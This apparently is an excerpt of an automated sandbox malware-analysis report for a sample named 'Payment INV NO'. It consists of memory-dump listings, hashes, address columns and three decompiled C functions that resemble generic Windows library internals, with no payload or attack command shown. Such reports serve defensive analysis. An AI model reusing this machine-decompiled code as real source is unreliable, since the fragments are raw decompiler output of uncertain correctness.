                                                          0x0179f3ca
                                                          0x0179f3ce
                                                          0x017f5cb1
                                                          0x017f5cdb
                                                          0x017f5ce0
                                                          0x017f5ce4
                                                          0x0179f45f
                                                          0x0179f45f
                                                          0x0179f46b
                                                          0x0179f46b
                                                          0x0179f3db
                                                          0x0179f3e2
                                                          0x0179f3ee
                                                          0x0179f3f0
                                                          0x0179f3f2
                                                          0x017f5cb8
                                                          0x017f5cb8
                                                          0x017f5cbc
                                                          0x017f5cbf
                                                          0x0179f419
                                                          0x0179f41b
                                                          0x0179f429
                                                          0x0179f42e
                                                          0x0179f42e
                                                          0x0179f433
                                                          0x017f5cd2
                                                          0x017f5cd4
                                                          0x017f5cd6
                                                          0x017f5cd6
                                                          0x00000000
                                                          0x0179f439
                                                          0x0179f43b
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f457
                                                          0x0179f45b
                                                          0x00000000
                                                          0x0179f45b
                                                          0x0179f433
                                                          0x0179f40c
                                                          0x0179f410
                                                          0x00000000
                                                          0x00000000
                                                          0x0179f416
                                                          0x0179f416

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2deb8724205583505ea9f97d2f597a70ec8d5aef7aa862dc18e48d6aa5361e9e
                                                          • Instruction ID: d55e7f5f8bc5bd35db48ab497aa6087be03a134beb1dc4ace7ca98d52d42c429
                                                          • Opcode Fuzzy Hash: 2deb8724205583505ea9f97d2f597a70ec8d5aef7aa862dc18e48d6aa5361e9e
                                                          • Instruction Fuzzy Hash: A421D036E0165BAADB119BA8C481BAFFB79AF50710F1242B9DF16EB341D2709D05C7E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A2F9A Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017A2F9A(void* __ecx) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v28;
				signed int _t42;
				void* _t47;
				void* _t51;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				signed int _t63;
				void* _t64;

				_t64 = __ecx;
				_v8 = 0;
				if(__ecx == 0) {
					L15:
					return 0xc0000001;
				}
				 *(__ecx + 0x18) =  *(__ecx + 0x18) & 0;
				 *(__ecx + 0x1c) =  *(__ecx + 0x1c) & 0;
				if( *((short*)(__ecx + 4)) > 0x40) {
					goto L15;
				}
				_t51 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
				if(_t51 == 0) {
					return 0xc0000017;
				}
				_t63 = ( *(_t64 + 4) & 0x0000ffff) - 1;
				if(_t63 < 0) {
					L13:
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t51);
					return 0;
				}
				_v12 = _t63 * 6;
				do {
					_t42 = E017DD0F0(1, _t63, 0);
					_v20 = 0;
					_t59 = _v12 +  *((intOrPtr*)(_t64 + 0x10));
					_v16 = _t42;
					if(0 ==  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_t64 + 0x10))))) {
						goto L12;
					}
					_t54 =  *0x1888638; // 0x0
					_v24 = _t51;
					_v28 = 0xaa0000;
					if(E017A3133(_t54, _t59,  &_v28) < 0) {
						goto L12;
					}
					_t55 =  *0x1888638; // 0x0
					_t60 = _v24;
					if( *((intOrPtr*)(_t55 + 0x48)) < 0x3e8) {
						_t47 = E017A37EE(_t55, _t60, 1,  &_v8);
						L10:
						if(_t47 < 0) {
							goto L12;
						}
						L11:
						 *(_t64 + 0x18) =  *(_t64 + 0x18) | _v16;
						 *(_t64 + 0x1c) =  *(_t64 + 0x1c) | _v20;
						goto L12;
					}
					if(E017A3099(_t55, _t60) >= 0) {
						goto L11;
					}
					_t56 =  *0x1888638; // 0x0
					_t47 = E017A2874(_t56, _v24);
					goto L10;
					L12:
					_v12 = _v12 - 6;
					_t63 = _t63 - 1;
				} while (_t63 >= 0);
				goto L13;
			}


















                                                          0x017a2fa4
                                                          0x017a2fa8
                                                          0x017a2faf
                                                          0x017f7cdc
                                                          0x00000000
                                                          0x017f7cdc
                                                          0x017a2fb5
                                                          0x017a2fb8
                                                          0x017a2fc0
                                                          0x00000000
                                                          0x00000000
                                                          0x017a2fdc
                                                          0x017a2fe0
                                                          0x00000000
                                                          0x017f7ce6
                                                          0x017a2fea
                                                          0x017a2fed
                                                          0x017a307f
                                                          0x017a308b
                                                          0x00000000
                                                          0x017a3090
                                                          0x017a2ff6
                                                          0x017a2ff9
                                                          0x017a3000
                                                          0x017a3005
                                                          0x017a300b
                                                          0x017a300e
                                                          0x017a3016
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3018
                                                          0x017a3022
                                                          0x017a3025
                                                          0x017a3033
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3035
                                                          0x017a303b
                                                          0x017a3045
                                                          0x017f7cf6
                                                          0x017a3062
                                                          0x017a3064
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3066
                                                          0x017a3069
                                                          0x017a306f
                                                          0x00000000
                                                          0x017a306f
                                                          0x017a3052
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3057
                                                          0x017a305d
                                                          0x00000000
                                                          0x017a3072
                                                          0x017a3072
                                                          0x017a3076
                                                          0x017a3076
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 978efd30d5e72581d344564d5b69c54ed189ff1dd36d323efa01978d7748ef76
                                                          • Instruction ID: dc2011ca3119c0e1b13639fe6f9962f311ebd280c6ebcb49fd5d205bb068c1bf
                                                          • Opcode Fuzzy Hash: 978efd30d5e72581d344564d5b69c54ed189ff1dd36d323efa01978d7748ef76
                                                          • Instruction Fuzzy Hash: 4831F331B402069FC724DFA8C984BAFFBFABB84204F408229E605D3255E330DA41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017CA70E Relevance: .1, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E017CA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				signed char _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1887b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1887b10 = 8;
					 *0x1887b14 = 0x1887b0c;
					 *0x1887b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E017CA990(0x1887b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = E017CA840(__edx, __ecx, __ecx, _t52, 0x1887b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1887b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1887b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1887b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = E017B4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1887b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E017DF3E0(_t50,  *0x1887b14, _t8 >> 3);
						_t28 =  *0x1887b14; // 0x0
						__eflags = _t28 - 0x1887b0c;
						if(_t28 != 0x1887b0c) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1887b14 = _t50;
						_t48 = _v12;
						 *0x1887b10 = _t9;
						goto L6;
					}
					 *0x1887b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                          0x017ca713
                                                          0x017ca714
                                                          0x017ca717
                                                          0x017ca71d
                                                          0x017ca720
                                                          0x017ca722
                                                          0x017ca727
                                                          0x017ca74a
                                                          0x017ca754
                                                          0x017ca75e
                                                          0x017ca768
                                                          0x017ca76a
                                                          0x017ca773
                                                          0x017ca78b
                                                          0x017ca790
                                                          0x017ca792
                                                          0x017ca741
                                                          0x017ca741
                                                          0x017ca743
                                                          0x017ca749
                                                          0x017ca749
                                                          0x017ca732
                                                          0x017ca73a
                                                          0x017ca797
                                                          0x017ca79d
                                                          0x017ca7a3
                                                          0x017ca7a9
                                                          0x017ca7b6
                                                          0x017ca7bc
                                                          0x017ca7ca
                                                          0x017ca7e0
                                                          0x017ca7e2
                                                          0x017ca7e4
                                                          0x01809bf2
                                                          0x00000000
                                                          0x01809bf2
                                                          0x017ca7ed
                                                          0x017ca7f2
                                                          0x017ca800
                                                          0x017ca805
                                                          0x017ca80d
                                                          0x017ca812
                                                          0x01809c08
                                                          0x01809c08
                                                          0x017ca818
                                                          0x017ca81b
                                                          0x017ca821
                                                          0x017ca824
                                                          0x00000000
                                                          0x017ca824
                                                          0x017ca7ae
                                                          0x00000000
                                                          0x017ca7ae
                                                          0x017ca73c
                                                          0x017ca73e
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9f6d0faddfa82e1ba4efe74770725ddcafae27d6d2bd0ee949387c167c4441a1
                                                          • Instruction ID: fa1beb547600e914dfb9adb1e1e05be998c3983ea37a6e4bd80078eca6f2d0e3
                                                          • Opcode Fuzzy Hash: 9f6d0faddfa82e1ba4efe74770725ddcafae27d6d2bd0ee949387c167c4441a1
                                                          • Instruction Fuzzy Hash: FF317FB1600209DBD721CF1CD890F59BBFAFB94710F24495EE655D7248E7719A01CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01799100 Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 76%
                                                          			E01799100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x186f6e8);
				E017ED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						L018688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E017ED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x18886c0; // 0x12607b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x18886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E017B2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						L018688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E017DAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x188b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x18884c0;
										if(_t69 >=  *0x18884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = L01869063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0179922A(_t82);
							_t53 = E017B7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = L01868B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x18886c0; // 0x12607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x18886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x18886bc;
										_t72 = 0x18886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01799240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x18886c4;
									_t72 = 0x18886c0;
									L18:
									E017C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                          0x01799100
                                                          0x01799100
                                                          0x01799100
                                                          0x01799100
                                                          0x01799102
                                                          0x01799107
                                                          0x0179910c
                                                          0x01799110
                                                          0x01799115
                                                          0x01799136
                                                          0x01799143
                                                          0x017f37e4
                                                          0x017f37e4
                                                          0x01799149
                                                          0x0179914e
                                                          0x0179914e
                                                          0x01799117
                                                          0x0179911d
                                                          0x00000000
                                                          0x00000000
                                                          0x0179911f
                                                          0x01799125
                                                          0x00000000
                                                          0x01799151
                                                          0x01799158
                                                          0x0179915d
                                                          0x01799161
                                                          0x01799168
                                                          0x017f3715
                                                          0x00000000
                                                          0x0179916e
                                                          0x0179916e
                                                          0x01799175
                                                          0x01799177
                                                          0x0179917e
                                                          0x0179917f
                                                          0x01799182
                                                          0x01799182
                                                          0x01799187
                                                          0x01799187
                                                          0x0179918a
                                                          0x0179918d
                                                          0x0179918f
                                                          0x01799192
                                                          0x01799195
                                                          0x01799198
                                                          0x01799198
                                                          0x01799198
                                                          0x0179919a
                                                          0x00000000
                                                          0x00000000
                                                          0x017f371f
                                                          0x017f3721
                                                          0x017f3727
                                                          0x017f372f
                                                          0x017f3733
                                                          0x017f3735
                                                          0x017f3738
                                                          0x017f373b
                                                          0x017f373d
                                                          0x017f3740
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3746
                                                          0x017f3749
                                                          0x00000000
                                                          0x00000000
                                                          0x017f374f
                                                          0x017f3751
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3757
                                                          0x017f3759
                                                          0x017f375c
                                                          0x017f375c
                                                          0x017f375e
                                                          0x017f375e
                                                          0x017f3761
                                                          0x017f3764
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3766
                                                          0x017f3768
                                                          0x017f37a3
                                                          0x017f37a3
                                                          0x017f37a5
                                                          0x017f37a7
                                                          0x017f37ad
                                                          0x017f37b0
                                                          0x017f37b2
                                                          0x017f37bc
                                                          0x017f37c2
                                                          0x017f37c2
                                                          0x017f37b2
                                                          0x01799187
                                                          0x01799187
                                                          0x0179918a
                                                          0x0179918d
                                                          0x0179918f
                                                          0x01799192
                                                          0x01799195
                                                          0x00000000
                                                          0x01799195
                                                          0x00000000
                                                          0x01799187
                                                          0x017f376a
                                                          0x017f376a
                                                          0x017f376c
                                                          0x017f376c
                                                          0x017f376f
                                                          0x017f3775
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3777
                                                          0x017f3779
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3782
                                                          0x017f3787
                                                          0x017f3789
                                                          0x017f3790
                                                          0x017f3790
                                                          0x017f378b
                                                          0x017f378b
                                                          0x017f378b
                                                          0x017f3792
                                                          0x017f3795
                                                          0x017f3795
                                                          0x017f3798
                                                          0x017f3798
                                                          0x017f379b
                                                          0x017f379b
                                                          0x017991a3
                                                          0x017991a9
                                                          0x017991b0
                                                          0x017991b4
                                                          0x017991b4
                                                          0x017991bb
                                                          0x017991c0
                                                          0x017991c5
                                                          0x017991c7
                                                          0x017f37da
                                                          0x017991cd
                                                          0x017991cd
                                                          0x017991cd
                                                          0x017991d2
                                                          0x017991d5
                                                          0x01799239
                                                          0x01799239
                                                          0x017991d7
                                                          0x017991db
                                                          0x017991e1
                                                          0x017991e7
                                                          0x017991fd
                                                          0x01799203
                                                          0x0179921e
                                                          0x01799223
                                                          0x00000000
                                                          0x01799223
                                                          0x01799205
                                                          0x01799208
                                                          0x0179920c
                                                          0x01799214
                                                          0x01799214
                                                          0x017991e9
                                                          0x017991e9
                                                          0x017991ee
                                                          0x017991f3
                                                          0x017991f3
                                                          0x017991f3
                                                          0x017991e7
                                                          0x00000000
                                                          0x017991db
                                                          0x01799187
                                                          0x01799168

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
